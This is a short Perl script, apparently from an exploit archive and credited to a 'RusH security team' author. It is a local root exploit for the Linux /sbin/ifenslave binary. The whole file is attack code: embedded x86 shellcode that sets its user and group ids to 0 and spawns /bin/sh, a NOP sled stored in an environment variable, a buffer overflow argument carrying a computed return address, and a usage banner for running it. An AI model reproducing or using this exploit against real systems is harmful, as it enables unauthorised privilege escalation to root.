#!/usr/bin/perl

# ***********************************
# /sbin/ifenslave local exploit
# just for fun =)
# coded by 1dt.w0lf
# RusH security team
# www.rsteam.ru , http://rst.void.ru
# **********************************

$shellcode ="\x31\xdb\x89\xd8\xb0\x17\xcd\x80" .
            "\x31\xdb\x89\xd8\xb0\x2e\xcd\x80" .
            "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" .
            "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" .
            "\x80\xe8\xdc\xff\xff\xff/bin/sh";

if(@ARGV != 1)
{
print "\n";
print "*** r57ifenslave.pl\n";
print "*** /sbin/ifenslave x86 linux local exploit\n";
print "*** usage: ./r57ifenslave.pl /path_to/ifenslave\n";
print "*** eg: ./r57ifenslave.pl /sbin/ifenslave\n";
print "\n";
exit();
}

 $vuln = $ARGV[0];
 $len=48;
 $ret = 0xbfffffff;
 $offset = 0;
 $nop = "\x90";

$ret2 = $ret + $offset - 5 - length($shellcode) - length($vuln);
print "\n";
print "path: $vuln\n";
print "offset: $offset\n";
print ("retaddr: 0x", sprintf('%lx',($ret2)),"\n");
print "\n";
$new_ret = pack('l', ($ret2));
chomp($new_ret);
for ($i=0; $i<$len; $i+=4)
 {
 $buffer .= $new_ret;
 }

for ($i=0; $i<10; $i++)
{
$buffer2 .= $nop;
}

$buffer2 .= $shellcode;
local($ENV{'buff'}) = $buffer2;
exec("$vuln $buffer");

# o-------[ EOF ]-------o